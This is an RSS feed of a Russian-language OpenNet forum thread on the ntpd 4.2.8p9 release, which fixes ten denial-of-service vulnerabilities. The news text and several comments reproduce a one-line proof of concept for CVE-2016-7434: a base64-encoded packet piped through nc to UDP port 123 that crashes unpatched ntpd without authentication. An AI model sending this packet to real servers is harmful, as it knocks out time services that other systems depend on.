<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Выпуск ntpd 4.2.8p9 с устранением уязвимостей </title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html</link>
    <description>Доступен (http://www.ntp.org/downloads.html) корректирующий выпуск сервера для синхронизации точного времени NTP 4.2.8p9, в котором устранено 10 уязвимостей (http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se), которые могут привести к отказу в обслуживании, путём исчерпания доступных ресурсов или инициирования краха процесса. Одна из уязвимостей (http://bugs.ntp.org/show_bug.cgi?id=3082) (CVE-2016-7434) достаточно проста в эксплуатации (http://dumpco.re/cve-2016-7434/) и может привести к краху процесса ntpd при отправке специально оформленного пакета без необходимости прохождения аутентификации (проблема проявляется на ранней стадии соединения):&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;    echo &quot;FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY&quot;&amp;#92;&lt;br&gt;    &quot;WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=&quot; &amp;#124; base64 -d &amp;#124; nc -u -v 127.0.0.1 123&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;URL: http://www.kb.cert.org/vuls/id/633847&lt;br&gt;Новость: http://www.opennet.ru/opennews/art.shtml?num=45553&lt;br&gt;</description>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (SysA)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#9</link>
    <pubDate>Mon, 28 Nov 2016 08:37:59 GMT</pubDate>
    <description>К сожалению ты неправ!&lt;br&gt;Крашится, но v4.2.8_p9 - нет.&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (pavlinux)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#8</link>
    <pubDate>Sun, 27 Nov 2016 00:21:55 GMT</pubDate>
    <description>&amp;gt; При копировании команды имейте в виду, что на opennet ...&lt;br&gt;&lt;br&gt;UNIX-way - printf&lt;br&gt; &lt;br&gt;&#091;code&#093;printf &quot;&#037;q&quot; &quot;FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY&quot;&#092;&lt;br&gt;    &quot;WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=&quot; &amp;#124; base64 -d &amp;#124; nc -u -v 127.0.0.1 123&lt;br&gt;&#091;/code&#093;&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (Аноним)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#7</link>
    <pubDate>Fri, 25 Nov 2016 09:40:30 GMT</pubDate>
    <description>Gentoo, ntp 4.2.8p8 - не крашится&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (rt)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#6</link>
    <pubDate>Thu, 24 Nov 2016 19:35:51 GMT</pubDate>
    <description>Потрясающе!&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (Аноним)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#5</link>
    <pubDate>Thu, 24 Nov 2016 13:37:04 GMT</pubDate>
    <description>в этот раз на слаке апдейт завезли быстро&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (burik666)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#4</link>
    <pubDate>Thu, 24 Nov 2016 10:59:04 GMT</pubDate>
    <description>точно! тупанул.&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (wd)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#3</link>
    <pubDate>Thu, 24 Nov 2016 10:33:55 GMT</pubDate>
    <description>wd ~ &#037; echo &quot;FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=&quot; &amp;#124;base64 -d &amp;#124;hexdump -C&lt;br&gt;00000000  16 0a 00 10 00 00 00 00  00 00 00 36 6e 6f 6e 63  &amp;#124;...........6nonc&amp;#124;&lt;br&gt;00000010  65 2c 20 6c 61 64 64 72  3d 5b 5d 3a 48 72 61 67  &amp;#124;e, laddr=&#091;&#093;:Hrag&amp;#124;&lt;br&gt;00000020  73 3d 33 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  &amp;#124;s=32, laddr=&#091;&#093;:W&amp;#124;&lt;br&gt;00000030  4f 50 00 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  &amp;#124;OP.2, laddr=&#091;&#093;:W&amp;#124;&lt;br&gt;00000040  4f 50 00 00                                       &amp;#124;OP..&amp;#124;&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (burik666)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#2</link>
    <pubDate>Thu, 24 Nov 2016 09:45:31 GMT</pubDate>
    <description>echo &quot;6nonce, laddr=&#091;&#093;:Hrags=32, laddr=&#091;&#093;:WOP2, laddr=&#091;&#093;:WOP&quot;&lt;br&gt;</description>
</item>

<item>
    <title>Выпуск ntpd 4.2.8p9 с устранением уязвимостей  (freehck)</title>
    <link>https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#1</link>
    <pubDate>Thu, 24 Nov 2016 08:23:10 GMT</pubDate>
    <description>При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;)&lt;br&gt;&lt;br&gt;echo &quot;FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=&quot;&lt;br&gt;</description>
</item>

</channel>
</rss>
